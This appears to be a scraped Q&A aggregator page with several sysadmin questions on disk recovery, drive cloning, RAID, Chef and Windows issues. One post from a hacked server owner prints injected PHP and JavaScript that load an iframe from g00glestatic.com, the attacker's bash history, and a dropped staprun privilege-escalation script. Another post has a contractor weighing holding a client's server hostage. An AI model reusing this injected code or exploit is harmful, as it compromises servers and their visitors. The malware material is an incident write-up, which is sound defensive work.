.img file. # ls -lh total 14T -rw-r--r-- 1 root root 14T Oct 25 01:57 candybox.img -rw-r--r-- 1 root root 271 Oct 20 14:32 candybox.logfile After numerous attempts using everything I could find online I could not coerce e2fsck to do anything on the image, so I used mkfs.ext4 -L candy candybox.img -m 0 -S and I was able to mount the dirty filesystem readonly without the journal and recover 960G of data. It gave all kinds of errors of various directories not existing and so forth but I was able to get some stuff. Which gave me some hope! I then ran e2fsck again and it had to recreate the root inode and gave a massive list of correcting group counts, I accepted the root inode creation and said no to everything else, leaving a completely empty filesystem. Re-ran again and said yes to all questions with the same result but now a "clean" but empty filesystem. extundelete gives me 0 recoverable inodes found. And now I'm stuck again, I can't come up with any other methods other than dropping to something like photorec which will give me an absolute mess with how large the filesystem was. I'm willing to re-copy the image from the original array and start over, if I can get any suggestions or ideas on a way to get more of my files back. I wish I could give more detailed logs of the commands that have run, but the output is long scrolled passed except for what gets logged to syslog and my memory is not as detailed due to the timeframe this has occurred over. Any help is greatly appreciated!

    Read the article

  • I'm a contract developer and I think I'm about to get screwed [closed]

    - by kagaku
    I do contract development on the side. You could say that I'm a contract developer? Considering I've only ever had one client I'd say that's not exactly the truth - more like I took a side job and needed some extra cash. It started out as a "rebuild our website and we'll pay you $10k" type project. Once that was complete (a bit over schedule, but certainly not over budget), the company hired me on as a "long term support" contractor. The contract is to go from March of this year, expiring on December 31st of this year - 10 months. Over which a payment is to be paid on the 30th of each month for a set amount. I've been fulfilling my end of the contract on all points - doing server maintenence, application and database changes, doing huge rush changes and pretty much just going above and beyond. Currently I'm in the middle of development of an iPhone mobile application (PhoneGap based) which is nearing completion (probably 3-4 weeks from submission). It has not been all peaches and flowers though. Each and every month when my paycheck comes due, there always seems to be an issue of sorts. These issues did not occur during the initial project, only during the support contract. The actual contract states that my check should be mailed out on the 30th of the month. I have received my check on time approximately once (on time being about 2-3 days within the 30th). I've received my paycheck as late as the 15th of the next month - over two weeks late. I've put up with it because I need the paycheck. There have been promises and promises of "we'll send it out on time next time! I promise" - only to receive it just as late the next month. When I ask about payment they give me a vibe like "why are you only worried about money?" - unfortunately I don't have the luxury of not worrying about money. The last straw was with my August payment, which should have been mailed on August 30th. I received it on September 12th. The reason for the delay? "USPS is delaying it man! we sent it out on the 1st!" is the reason I got. When I finally got the check in the mail, the postage on the envelope was marked September 10th - the date it was run through the postage machine. I've been outright lied to, at this point. I carry on working, because again - I need a paycheck. I orchestrated the move of our application to a new server, developed a bunch of new changes and continued work on the iPhone app. All told I probably went over my hourly allotment (I'm paid for 40 hours a month, I probably put in at least 50). On Saturday, the 1st, I gave the main contact at the company (a company of 3, by the way - this is not some big corporation) a ring and filled him in on the status of my work for the past two weeks. Unusually I hadn't heard from him since the middle of September. His response was "oh... well, that is nice and uh.. good job. well, we've been talking within the company about things and we've certainly got some decisions ahead of us..." - not verbatim but you get the idea (I hope?). I got out of this conversation that the site is not doing very well (which it's not) and they're considering pulling the plug. Crap, this contract is going to end early - there goes Christmas! Fine, that's alright, no problem. I'll get paid for the last months work and call it a day. Unfortunately I still haven't gotten last months check, and I'm getting dicked around now. "Oh.. we had problems transferring funds, we'll try and mail it out tomorrow" and "I left a VM with the finance guy, but I can't get ahold of him". So I'm getting the feeling I'm not getting paid for all the work I put in for September. This is obviously breach of contract, and I am pissed. Thinking irrationally, I considered changing all their passwords and holding their stuff hostage. Before I think it through (by the way, I am NOT going to do this, realized it would probably get me in trouble), I go and try some passwords for our various accounts. Google Apps? Oh, I'm no longer administrator here. Godaddy? Whoops, invalid password. Disqus? Nope, invalid password here too. Google Adsense / Analytics? Invalid password. Dedicated server account manager? Invalid password. Now, I have the servers root password - I just built the box last week and haven't had a chance to send the guy the root password. Wasn't in a rush, I manage the server and they never touch it. Now all of a sudden all the passwords except this one are changed; the writing is on the wall - I am out. Here's the conundrum. I have the root password, they do not. If I give them this password all the leverage I have is gone, out the door and out of my hands. During this argument of why am I not getting paid the guy sends me an email saying "oh by the way, what's the root username and password to the server?". Considering he knows absolutely nothing, I gave him an "admin" account which really has almost no rights. I still have exclusive access to the server, I just don't know where to go. I can hold their data hostage, but I'm almost positive this is the wrong thing to do. I'd consider it blackmail, regardless of whether or not I have gotten paid yet. I can "break" something on the server and give them the whole "well, if you were paying me I could fix it!" spiel. This works from a "well he's not holding their stuff hostage" point of view, but what stops them from hiring some one else to just fix the issue at hand? For all I know the guys nephew is a "l33t hax0r" and can figure it out for free. I can give in, document as much as I can and take him to small claims court. This is breach of contract, I'm not getting paid. I have a case, right? ???? Does anyone have any experience in this? What can I do? What are my options? I'm broke, I can't afford a lawyer and I can barely afford not getting this paycheck. My wife doesn't work (I work two jobs so she doesn't have to work - we have a 1 year old) and is already looking at getting a part time job to cover the bills. Long term we'll be fine, but this has pissed me off beyond belief! Help me out, I'm about to get screwed.

    Read the article

  • Backup, Migrate or Clone Failing CentOS 4 (LVM)

    - by Hegelworm
    I've been running a BlueQuartz CentOS 4 system (Nuonce.net distro) for a few years now and although the hard drive (Deskstar) has always been a bit noisy, on a few recent occasions I've heard it having trouble spinning up. Basically, I want to clone this drive to a similar sized one (80 Gig). I've spent many hours reading upon dd, dd_rescue, rsync, clonezilla and LVM mirroring yet the sheer number of options and nightmarish accounts has left me frozen - unable to make an informed decision as to how to start. I've made a few attempts. dd failed after about 2 hours, as, although the drives appeared to be identical on the surface (ATA Seagate Barracudas, Thai not Chinese), the destination drive is slightly smaller. My most recent attempt involved using a Debian CD to format the new drive and then rsync-ing everything over and editing the new drive's grub and fstab to reflect the changes. No joy here either as I hadn't chosen LVM when partitioning the destination drive and it wouldn't boot. As you can probably tell, I'm out of my depth here and a panic-invoking mixture of caution and frustration has prompted me to sign up here. The server itself, although not strictly a production environment, has a very specific installation of Festival, LAME and ffMpeg and provides the back-end for a Text-to-Speech jQuery plugin that I've built over the last 2 years. I'm also planning to rebuild the whole TTS system on Debian as the existing CentOS system still has PHP4 etc. For now though, I'd really like to just shift everything over to a new drive. As this is my first post, please feel free to lay any house rules on me that I might've overlooked; I've been hovering around StackOverflow for a while now but have only just signed up. Many thanks. Update: Thanks for your responses so far - it's much appreciated and makes me feel a little more confident when I can double-check things here. I had the idea of doing a fresh install of CentOS (from the original disk) on the new drive so the partitions and LVM were all set up correctly (after disconnecting my source drive to prevent painful mistakes). I then booted into rescue mode from the same CD, and, to avoid a conflicting label, changed the /boot partition's label using e2label to /bootnew. I then changed the VolGroup name using lvm vgrename from VolGroup00 to VolGroup001. I could then boot with both drives in. After mounting the new drive (via its VolGroup001 alias) into /newhd, I rsync-ed over everything I could to the new drive, using -avr switches and backslashes. Like mentioned here. I then disconnected my original source drive again, booted from the liveCD again, changed back the boot partition label from /bootnew to /boot using e2label and then renamed the VolGroup back to VolGroup00. I then rebooted and it went through the familiar start-up routine only to not find a host of files in proc, usr, lib, var etc. The boot did complete but there were lots of red 'FAILS'. I could log in with my existing creds, but the network was kaput, I couldn't startX (desktop GUI) and there were also a few (a lot) of error messages pertaining to iptables. Back to square one. I naively thought I'd nailed it. Shall I just buy a bigger hard drive and attempt the dd route? I've read that this can mess with LVM setups and there's the added risk of working on two unmounted drives at once with a low-level tool. Thanks again.

    Read the article

  • Windows 8 Stuck on Start Screen File Search

    - by baturayd
    I have been searching someone else having the same issue but I couldn't find any. Here is my problem: I'm using Windows 8 Pro with Media Center. File search screen does not close itself after I make a file search within start screen. It stuck on that screen. I can't go back to desktop, therefore, task manager is inaccessible. Only way to get out of it is to sign out. It also looks like non-operational. It doesn't give me any result at all. It's just a blank screen with "Files" title. It used to work perfectly. Things I have done before coming here: Safe mode minimal boot to ensure no other 3rd party software interferes. sfc haven't found any inconsistencies. Search index has been rebuild. Normal boot with all 3rd party services and start-up items disabled. System restore to a date that I know this feature was functional. And by the way, I have installed all updates released so far. I strongly used file search via start menu back in Windows 7. This is an absolute game changer for me. I'm curious what causes this. I'll do a "system refresh" if I can't fix this. I'm working on it, I'll keep this thread updated should I find any fix. First update: I just discovered that file search screen gets stuck if it's invoked by typing query directly in start screen. It doesn't get stuck if it's invoked from win + x menu. I was able to "escape" from stuck screen with invoking it again by win + x menu. After rebuilding search index again, search suggestions started to appear again but still there is no file search functionality. Second update: "Results for" expression appears only for a second near to "Files" title when search is initialized. Third update: As a last resort, I finally tried to do a "System Refresh" which has also failed to refresh by giving an error after waiting almost 20 minutes at 99%. (Seriously?) After cold boot it began to undo changes. After changes were reverted, I boot the machine without doing anything further and bingo! Search began acting normal again. This is a totally weird solution. It obviously fixed certain system files during failed refresh, and kept those changes untouched because they were supposed to be that way at the first place. I'll keep this thread alive should anyone comes with a more logical explanation. Forth update: After a windows update, search functionality again stopped responding. It happened after a system update for the first time. Now I have a pretty good suspicion about system update, though I have no solid proof of its involvement with this problem.

    Read the article

  • Mass targeted malware installed - g00glestatic.com [closed]

    - by Silver89
    Possible Duplicate: My server’s been hacked EMERGENCY I run a webserver which over the last few days seems to have become infected with malware that tries to include content from "http://g00glestatic.com/s.js" It appears the attacker gained access to one of the user accounts (not root), made a few changes, added a few files and ran a few bash commands. These changes stuck out clearly to me because it is not a shared server and I am the only person with access through very secure passwords. The php/javascript code that was added .php files, this code was added: #9c282e# if(!$srvc_counter) { echo "<script type=\"text/javascript\" src=\"http://g00glestatic.com/s.js\"></script>"; $srvc_counter = true;} #/9c282e# .js files, this code was added: /*9c282e*/ var _f = document.createElement('iframe'),_r = 'setAttribute'; _f[_r]('src', 'http://g00glestatic.com/s.js'); _f.style.position = 'absolute';_f.style.width = '10px'; _f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1); _f.style.left = '-5540px'; document.write('<div id=\'MIX_ADS\'></div>'); document.getElementById('MIX_ADS').appendChild(_f); /*/9c282e*/ The bash command taken from .bash_history (Some usernames/passwords have been subbed) su -c id $replacedPassword id; id; sudo id; replacedPassword id; cd /home/replacedUserId1; chmod +x .sess_28e2f1bc755ed3ca48b32fbcb55b91a7; ./.sess_28e2f1bc755ed3ca48b32fbcb55b91a7; rm /home/replacedUserId1/.sess_28e2f1bc755ed3ca48b32fbcb55b91a7; id; cd /home/replacedUserId1; chmod +x .sess_05ee5257fed0ac8e0f12096f4c3c0d20; ./.sess_05ee5257fed0ac8e0f12096f4c3c0d20; rm /home/replacedUserId1/.sess_05ee5257fed0ac8e0f12096f4c3c0d20; id; cd /home/replacedUserId1; chmod +x .sess_bfa542fc2578cce68eb373782c5689b9; ./.sess_bfa542fc2578cce68eb373782c5689b9; rm /home/replacedUserId1/.sess_bfa542fc2578cce68eb373782c5689b9; id; cd /home/replacedUserId1; chmod +x .sess_bfa542fc2578cce68eb373782c5689b9; ./.sess_bfa542fc2578cce68eb373782c5689b9; rm /home/replacedUserId1/.sess_bfa542fc2578cce68eb373782c5689b9; id; cd /home/replacedUserId1; chmod +x .sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; ./.sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; rm /home/replacedUserId1/.sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; id; kill -9 $$;; kill -9 $$;; kill -9 $$; The above seems to move files added to the public_html to the level above? I also have all 4 of the files that were added: .sess_28e2f1bc755ed3ca48b32fbcb55b91a7 .sess_05ee5257fed0ac8e0f12096f4c3c0d20 .sess_bfa542fc2578cce68eb373782c5689b9 .sess_fb19dfb52ed4a3ae810cd4454ac6ef1e Of those four above files, three are none viewable in notepad++ and display null characters, whereas sess_fb19dfb52ed4a3ae810cd4454ac6ef1e consists of: #!/bin/sh export PATH=$PATH:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/bin; export LC_ALL=en_US.UTF-8 LC_COLLATE=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 LANG=en_US.UTF-8 LANGUAGE=en_US.UTF-8 export TERM=linux echo -n "-> checking staprun: "; if which staprun 2>&1 | grep -q "no $1"; then flag=1 elif [ -z "`which $1 2>&1`" ]; then flag=1; fi if [ "$flag" = "1" ]; then echo "no staprun, exiting"; exit; else echo "found"; echo "-> trying to exploit... "; printf "install uprobes /bin/sh" > ololo.conf; MODPROBE_OPTIONS="-C ololo.conf" staprun -u ololo rm -f ololo.conf fi Other Noticeable Edits Any files that contain: ([.htaccess]|[index|header|footer].php|[*.js]) will have been modified and all system file and directory permissions will have been changed to: x--x--x My steps to remove this malware re uploaded original php/js files to revert any changes Changed all user passwords Modified hosts.allow to a static ip so that only I have access Removed the above 4 files and checked all modified file dates within that directory to check for any other recent modifications, none can be found Conclusion I'm hoping that as they did not have root access, any changes they wished to make higher up failed and they were only able to display an iframe on the site for a short amount of time? What else do I need to look for to check the malware infection has not spread? Second Conclusion This malware sinks too deep to 'clean', if you get infected I recommend a server nuke and rebuild from backups with increased security. Possibility It's possible that Filezilla ftp passwords were stolen through a trojan as they're unfortunately stored unencrypted. However Trend Micro Titanium has not found any. The settings box to disable passwords being saved has now been ticked, I also recommend that you take this action.

    Read the article

  • Can't Remove Logical Drive/Array from HP P400

    - by Myles
    This is my first post here. Thank you in advance for any assistance with this matter. I'm trying to remove a logical drive (logical drive 2) and an array (array "B") from my Smart Array P400. The host is a DL580 G5 running 64-bit Red Hat Enterprise Linux Server release 5.7 (Tikanga). I am unable to remove the array using either hpacucli or cpqacuxe. I believe it is because of "OS Status: LOCKED". The file system that lives on this array has been unmounted. I do not want to reboot the host. Is there some way to "release" this logical drive so I can remove the array? Note that I do not need to preserve the data on logical drive 2. I intend to physically remove the drives from the machine and replace them with larger drives. I'm using the cciss kernel module that ships with Red Hat 5.7. Here is some information pertaining to the host and the P400 configuration: [root@gort ~]# cat /etc/redhat-release Red Hat Enterprise Linux Server release 5.7 (Tikanga) [root@gort ~]# uname -a Linux gort 2.6.18-274.el5 #1 SMP Fri Jul 8 17:36:59 EDT 2011 x86_64 x86_64 x86_64 GNU/Linux [root@gort ~]# rpm -qa | egrep '^(hp|cpq)' cpqacuxe-9.30-15.0 hp-health-9.25-1551.7.rhel5 hpsmh-7.1.2-3 hpdiags-9.3.0-466 hponcfg-3.1.0-0 hp-snmp-agents-9.25-2384.8.rhel5 hpacucli-9.30-15.0 [root@gort ~]# hpacucli HP Array Configuration Utility CLI 9.30.15.0 Detecting Controllers...Done. Type "help" for a list of supported commands. Type "exit" to close the console. => ctrl all show config detail Smart Array P400 in Slot 0 (Embedded) Bus Interface: PCI Slot: 0 Cache Serial Number: PA82C0J9SVW34U RAID 6 (ADG) Status: Enabled Controller Status: OK Hardware Revision: D Firmware Version: 7.22 Rebuild Priority: Medium Expand Priority: Medium Surface Scan Delay: 15 secs Surface Scan Mode: Idle Wait for Cache Room: Disabled Surface Analysis Inconsistency Notification: Disabled Post Prompt Timeout: 0 secs Cache Board Present: True Cache Status: OK Cache Ratio: 25% Read / 75% Write Drive Write Cache: Disabled Total Cache Size: 256 MB Total Cache Memory Available: 208 MB No-Battery Write Cache: Disabled Cache Backup Power Source: Batteries Battery/Capacitor Count: 1 Battery/Capacitor Status: OK SATA NCQ Supported: True Logical Drive: 1 Size: 136.7 GB Fault Tolerance: RAID 1 Heads: 255 Sectors Per Track: 32 Cylinders: 35132 Strip Size: 128 KB Full Stripe Size: 128 KB Status: OK Caching: Enabled Unique Identifier: 600508B100184A395356573334550002 Disk Name: /dev/cciss/c0d0 Mount Points: /boot 101 MB, /tmp 7.8 GB, /usr 3.9 GB, /usr/local 2.0 GB, /var 3.9 GB, / 2.0 GB, /local 113.2 GB OS Status: LOCKED Logical Drive Label: A0027AA78DEE Mirror Group 0: physicaldrive 1I:1:2 (port 1I:box 1:bay 2, SAS, 146 GB, OK) Mirror Group 1: physicaldrive 1I:1:1 (port 1I:box 1:bay 1, SAS, 146 GB, OK) Drive Type: Data Array: A Interface Type: SAS Unused Space: 0 MB Status: OK Array Type: Data physicaldrive 1I:1:1 Port: 1I Box: 1 Bay: 1 Status: OK Drive Type: Data Drive Interface Type: SAS Size: 146 GB Rotational Speed: 10000 Firmware Revision: HPDE Serial Number: 3NM57RF40000983878FX Model: HP DG146BB976 Current Temperature (C): 29 Maximum Temperature (C): 35 PHY Count: 2 PHY Transfer Rate: Unknown, Unknown physicaldrive 1I:1:2 Port: 1I Box: 1 Bay: 2 Status: OK Drive Type: Data Drive Interface Type: SAS Size: 146 GB Rotational Speed: 10000 Firmware Revision: HPDE Serial Number: 3NM55VQC000098388524 Model: HP DG146BB976 Current Temperature (C): 29 Maximum Temperature (C): 36 PHY Count: 2 PHY Transfer Rate: Unknown, Unknown Logical Drive: 2 Size: 546.8 GB Fault Tolerance: RAID 5 Heads: 255 Sectors Per Track: 32 Cylinders: 65535 Strip Size: 64 KB Full Stripe Size: 256 KB Status: OK Caching: Enabled Parity Initialization Status: Initialization Completed Unique Identifier: 600508B100184A395356573334550003 Disk Name: /dev/cciss/c0d1 Mount Points: None OS Status: LOCKED Logical Drive Label: A5C9C6F81504 Drive Type: Data Array: B Interface Type: SAS Unused Space: 0 MB Status: OK Array Type: Data physicaldrive 1I:1:3 Port: 1I Box: 1 Bay: 3 Status: OK Drive Type: Data Drive Interface Type: SAS Size: 146 GB Rotational Speed: 10000 Firmware Revision: HPDE Serial Number: 3NM2H5PE00009802NK19 Model: HP DG146ABAB4 Current Temperature (C): 30 Maximum Temperature (C): 37 PHY Count: 1 PHY Transfer Rate: Unknown physicaldrive 1I:1:4 Port: 1I Box: 1 Bay: 4 Status: OK Drive Type: Data Drive Interface Type: SAS Size: 146 GB Rotational Speed: 10000 Firmware Revision: HPDE Serial Number: 3NM28YY400009750MKPJ Model: HP DG146ABAB4 Current Temperature (C): 31 Maximum Temperature (C): 36 PHY Count: 1 PHY Transfer Rate: 3.0Gbps physicaldrive 2I:1:5 Port: 2I Box: 1 Bay: 5 Status: OK Drive Type: Data Drive Interface Type: SAS Size: 146 GB Rotational Speed: 10000 Firmware Revision: HPDE Serial Number: 3NM2FGYV00009802N3GN Model: HP DG146ABAB4 Current Temperature (C): 30 Maximum Temperature (C): 38 PHY Count: 1 PHY Transfer Rate: Unknown physicaldrive 2I:1:6 Port: 2I Box: 1 Bay: 6 Status: OK Drive Type: Data Drive Interface Type: SAS Size: 146 GB Rotational Speed: 10000 Firmware Revision: HPDE Serial Number: 3NM8AFAK00009920MMV1 Model: HP DG146BB976 Current Temperature (C): 31 Maximum Temperature (C): 41 PHY Count: 2 PHY Transfer Rate: Unknown, Unknown physicaldrive 2I:1:7 Port: 2I Box: 1 Bay: 7 Status: OK Drive Type: Data Drive Interface Type: SAS Size: 146 GB Rotational Speed: 10000 Firmware Revision: HPDE Serial Number: 3NM2FJQD00009801MSHQ Model: HP DG146ABAB4 Current Temperature (C): 29 Maximum Temperature (C): 39 PHY Count: 1 PHY Transfer Rate: Unknown

    Read the article

  • Chef-solo cannot locate an nginx recipe template

    - by crftr
    I have been recently experimenting with Chef. I thought I would attempt to rebuild my personal web server using chef-solo. It's an AWS instance running the Amazon 64bit Linux AMI. My first objective is to install nginx. I have cloned the Opscode cookbook repository, and am using their nginx cookbook. My problem appears to be that chef-solo cannot find a template after it has started the process. The command I'm using is chef-solo -j /etc/chef/dna.json dna.json { "nginx": { "user": "ec2-user" }, "recipes": [ "nginx" ] } solo.rb file_cache_path "/var/chef-solo" cookbook_path "/var/chef-solo/cookbooks" ...the output [root@ip-10-202-221-135 chef-solo]# chef-solo -j /etc/chef/dna.json /usr/lib64/ruby/gems/1.9.1/gems/systemu-2.2.0/lib/systemu.rb:29: Use RbConfig instead of obsolete and deprecated Config. [Fri, 27 Jan 2012 19:41:36 +0000] INFO: *** Chef 0.10.8 *** [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Setting the run_list to ["nginx"] from JSON [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Run List is [recipe[nginx]] [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Run List expands to [nginx] [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Starting Chef Run for ip-10-202-221-135.ec2.internal [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Running start handlers [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Start handlers complete. [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Missing gem 'mysql' [Fri, 27 Jan 2012 19:41:38 +0000] INFO: Processing package[nginx] action install (nginx::default line 21) [Fri, 27 Jan 2012 19:41:39 +0000] INFO: Processing directory[/var/log/nginx] action create (nginx::default line 23) [Fri, 27 Jan 2012 19:41:39 +0000] INFO: Processing template[/usr/sbin/nxensite] action create (nginx::default line 30) [Fri, 27 Jan 2012 19:41:39 +0000] INFO: Processing template[/usr/sbin/nxdissite] action create (nginx::default line 30) [Fri, 27 Jan 2012 19:41:39 +0000] INFO: Processing template[nginx.conf] action create (nginx::default line 38) [Fri, 27 Jan 2012 19:41:39 +0000] INFO: Processing template[/etc/nginx/sites-available/default] action create (nginx::default line 46) [Fri, 27 Jan 2012 19:41:39 +0000] INFO: template[/etc/nginx/sites-available/default] mode changed to 644 [Fri, 27 Jan 2012 19:41:39 +0000] ERROR: template[/etc/nginx/sites-available/default] (nginx::default line 46) has had an error [Fri, 27 Jan 2012 19:41:39 +0000] ERROR: template[/etc/nginx/sites-available/default] (/var/chef-solo/cookbooks/nginx/recipes/default.rb:46:in `from_file') had an error: template[/etc/nginx/sites-available/default] (nginx::default line 46) had an error: Errno::ENOENT: No such file or directory - (/tmp/chef-rendered-template20120127-29441-1yp55vz, /etc/nginx/sites-available/default) /usr/lib64/ruby/1.9.1/fileutils.rb:519:in `rename' /usr/lib64/ruby/1.9.1/fileutils.rb:519:in `block in mv' /usr/lib64/ruby/1.9.1/fileutils.rb:1515:in `block in fu_each_src_dest' /usr/lib64/ruby/1.9.1/fileutils.rb:1531:in `fu_each_src_dest0' /usr/lib64/ruby/1.9.1/fileutils.rb:1513:in `fu_each_src_dest' /usr/lib64/ruby/1.9.1/fileutils.rb:508:in `mv' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/provider/template.rb:47:in `block in action_create' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/mixin/template.rb:48:in `block in render_template' /usr/lib64/ruby/1.9.1/tempfile.rb:316:in `open' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/mixin/template.rb:45:in `render_template' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/provider/template.rb:99:in `render_with_context' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/provider/template.rb:39:in `action_create' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource.rb:440:in `run_action' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/runner.rb:45:in `run_action' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/runner.rb:81:in `block (2 levels) in converge' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/runner.rb:81:in `each' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/runner.rb:81:in `block in converge' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection.rb:94:in `block in execute_each_resource' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection/stepable_iterator.rb:116:in `call' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection/stepable_iterator.rb:116:in `call_iterator_block' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection/stepable_iterator.rb:85:in `step' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection/stepable_iterator.rb:104:in `iterate' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection/stepable_iterator.rb:55:in `each_with_index' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection.rb:92:in `execute_each_resource' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/runner.rb:76:in `converge' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/client.rb:312:in `converge' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/client.rb:160:in `run' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/application/solo.rb:192:in `block in run_application' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/application/solo.rb:183:in `loop' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/application/solo.rb:183:in `run_application' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/application.rb:67:in `run' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/bin/chef-solo:25:in `<top (required)>' /usr/bin/chef-solo:19:in `load' /usr/bin/chef-solo:19:in `<main>' [Fri, 27 Jan 2012 19:41:39 +0000] ERROR: Running exception handlers [Fri, 27 Jan 2012 19:41:39 +0000] ERROR: Exception handlers complete [Fri, 27 Jan 2012 19:41:39 +0000] FATAL: Stacktrace dumped to /var/chef-solo/chef-stacktrace.out [Fri, 27 Jan 2012 19:41:39 +0000] FATAL: Errno::ENOENT: template[/etc/nginx/sites-available/default] (nginx::default line 46) had an error: Errno::ENOENT: No such file or directory - (/tmp/chef-rendered-template20120127-29441-1yp55vz, /etc/nginx/sites-available/default) What am I doing incorrectly?

    Read the article

  • Why does Process Explorer cause highly targeted failure of some applications / basic UI functions in a high-power EC2 Windows instance?

    - by Dan Nissenbaum
    Update: I have determined that Process Explorer itself - the program I am using to debug a performance issue - seems to be the cause of the issue. See note, with updated question, at end. I am running a high-power (cc2.8xlarge) Amazon AWS EC2 Windows instance off of a boot EBS volume, provisioned at 2500 PIOPS, which was created from a snapshot of a previous boot volume. My purpose with the instance is to use it as a development workstation with many developer tools installed, such as Visual Studio, a local XAMPP stack, etc. I have upwards of 40 programs installed on the machine. The usability of the instance as a development machine often works quite well. The RDP lag is adequately small. I have used it for hours on end without problems for some of my most intense development tasks. As a result, I have just purchased a reserved instance, and I opted to rebuild my development machine starting from scratch with a Windows Server 2012 AMI. After having installed all of my desired/required applications for development over this past week, again the machine seems to often work well and I have worked for up to an hour at a time without problems doing heavy development work. However, I continue to run into catastrophic OS usability issues that may prevent me from being able to rely on this machine as a development machine. I would like to track down the source of the problem, if there is an easily identifiable source. (Update: I have tracked down the source to be Process Explorer, the very program I was using to debug the problem. See update at end.) The issues are as follows. (These are some primary examples) Some applications, after a period of adequate responsiveness, suddenly begin to respond very, very slowly to basic user interface actions such as clicking on menus and pressing Ctrl-Tab to switch between open documents. Two examples are UltraEdit and PhpEd. It typically takes ~2 seconds for a menu to appear, and ~4 seconds to switch between open documents. Additionally, insertion point motion in the editor is lagged by upwards of ~2 seconds. Process Explorer, which I am using to help debug the problem, seems to run acceptably for a couple of minutes, but on multiple occasions Process Explorer itself hangs completely. It hangs at the same time as the problems noted above. When it hangs, it is 100% unresponsive. Clicking on its taskbar icon neither causes it to come to the top or go behind, and its viewable area is filled with nothing but a region partially containing pure white and partially containing incomplete windows widgets that are unreadable, and that never change. Waiting 10 minutes does not clear the problem. Attempting to force-quit Process Explorer by right-clicking on its taskbar icon and choosing "Close Window" takes about 5 full minutes to exit (Process Explorer itself can't be used to exit Process Explorer, and it is registered as a Task Manager substitute). Other programs work just fine during this time. For example, Chrome tabs flip very quickly back and forth, menus pop open instantly, web pages load quickly, and typing in forms/web applications inside the browser works promptly. Another example of an application that works crisply is Filemaker - its menus open instantly, and switching views in this application occurs promptly. Other applications also work without issue. Also, switching between applications occurs promptly as well. It is only a handful of applications that exhibit the problem, with some primary examples given above. At first I thought that EBS IOPS might be a problem. Therefore, I ran Performance Monitor, and watched the "Disk Transfers/sec" monitor in real time. At no point did this measure come anywhere close to hitting the 2500 PIOPS provisioned for the EBS volume. The RAM was also well under the limit (~10 GB used out of 60 GB). I did notice that one CPU core (out of 32 logical cores) was fully thrashing at 100% (i.e., ~3.1%) during the problematic periods. This seems to indicate that a single CPU core is handling the menus / flipping between open documents (for some applications only) / managing the Process Explorer user interface, and that this single core was hosed for some reason during the problematic periods. Also note that I have a desktop workstation (Windows 7) that I also use as a development machine, via a remote connection, with a nearly identical set of programs installed, and this desktop workstation does not exhibit any of the problems I've discussed above. I have been using it heavily for well over a year now. Any suggestions regarding either the source of the problem, or steps I might take to investigate the source of the problem, would be appreciated. Thanks. Note: After extensive testing & investigation, I have noticed that when I quit Process Explorer, the problem vanishes and the system performance returns to normal, and then reappears quickly when I run Process Explorer again (note: again, the performance problems only appear for a subset of applications - other applications work perfectly fine during the same period). My question is therefore (thankfully) more specific: Why does Process Explorer cause highly targeted failure of some applications (including itself) and basic UI functions, in a high-power EC2 Windows instance?

    Read the article

  • squid3 auth thru samba using ntlm to AD doesn't work

    - by derty
